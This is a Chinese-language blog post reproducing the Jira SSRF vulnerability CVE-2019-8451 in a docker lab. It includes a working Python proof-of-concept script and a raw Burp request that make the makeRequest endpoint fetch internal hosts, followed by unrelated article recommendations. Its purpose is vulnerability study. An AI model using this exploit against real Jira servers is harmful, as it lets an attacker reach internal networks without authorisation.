CVE-2019-8451(Jira未授权SSRF漏洞)

1.漏洞概述

jira的/plugins/servlet/gadgets/makeRequest资源存在ssrf漏洞。

2.环境搭建

使用docker 进行搭建

docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

访问ip:8080进行安装jira,安装过程需要生成JIRA使用许可证,这里我找了半天,需要先注册账号,然后再访问下面这个链接

https://my.atlassian.com/license/evaluation 这个

在这里插入图片描述

3.漏洞利用

这里我找了一个poc,利用ssrf将请求链接到ceye.io上面,可以看到回显记录

import requests

import sys

# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/
from past.builtins import raw_input


def ssrf_poc(url, ssrf_url):
    if url[-1] == '/':
        url = url[:-1]
    else:
        url = url

    vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url

    headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "X-Atlassian-Token": "no-check",
    "Connection": "close"
    }

    r = requests.get(url=vuln_url, headers=headers)
    if r.status_code == 200 and 'set-cookie' in r.text:
        print("\n>>>>Send poc Success!\n")
        print('X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME'))
        print("\n>>>>vuln_url= " + vuln_url + '\n')
        print(r.content)
    else:
        print("No Vuln Exit!")


if __name__ == "__main__":
    
    while True:
        print()
        ssrf_url = raw_input(">>>>SSRF URL: ")
        url = "http://192.168.184.130:8080/"   #这是我搭建环境的地址
        ssrf_poc(url, ssrf_url)

在这里插入图片描述

运行poc需要输入dnslog地址

当然可以利用这个漏洞访问内网资源,原理:向http://192.168.184.130 这个服务器发送请求,让它向内网的另一台服务器192.168.184.131发起请求

burpsuit POC

GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.184.131/sqli-labs/Less-1/?id=1 HTTP/1.1
Host: 192.168.184.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.184.130:8080/secure/Dashboard.jspa
X-Atlassian-Token: no-check
Content-Length: 0

在这里插入图片描述

发送请求并收到了http://192.168.184.131/sqli-labs/Less-1/?id=1的页面信息

这里需要设置jira的白名单,不然会拒绝访问

在这里插入图片描述

# web安全
Logo
向您推荐>>Eolink开发者社区

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐

沃云统一开发平台介绍

沃云集成平台研发平台介绍1.平台优势2.平台原理3.研发平台使用方法4.遇到的问题5.现阶段实现的功能6.后续需要补充的功能和优化内容研发平台介绍1.平台优势解决孤岛式应用,实现能力共享;现有系统框架过于复杂,跨系统业务处理成本居高不下,协同服务共享,降低运维成本;提高项目应用资源监控能力,改善资源利用率;业务微服务化,快速发布、快速部署,快速响应业务需求变化;沃云平台不仅提供了自动化的、可快速部

avatar 云原生

(20200916 Solved)docker-compose up创建容器自动退出

问题描述如题,创建容器后自动退出了。并且docker start container无效解决方案原因是缺失了控制终端的配置,需要在docker-compose.yml中增加tty:true ,有时候这样也不行,需要再增加一个command:/bin/bash,命令不一定是这个,需要是一个不会退出的命令,然后用-d后台启动容器。Referencesdocker-compose启动容器后自动退出...

avatar 云原生

基于docker的test-containers环境百宝箱

笔者语录: 我开了个公众号【Java你我他】,欢迎大家关注。  在很多时候,程序猿们更关注代码本身,而不愿意把时间花费在环境搭建上,这也是Docker变得越来越受欢迎的原因之一。test-containe是Docker生态圈中的一颗新星,其 主要针对测试领域、背靠Docker实现环境百宝箱功能。  test-containers: 你要的环境,我都有~  假设我们现在需要一个redis-clust

avatar 云原生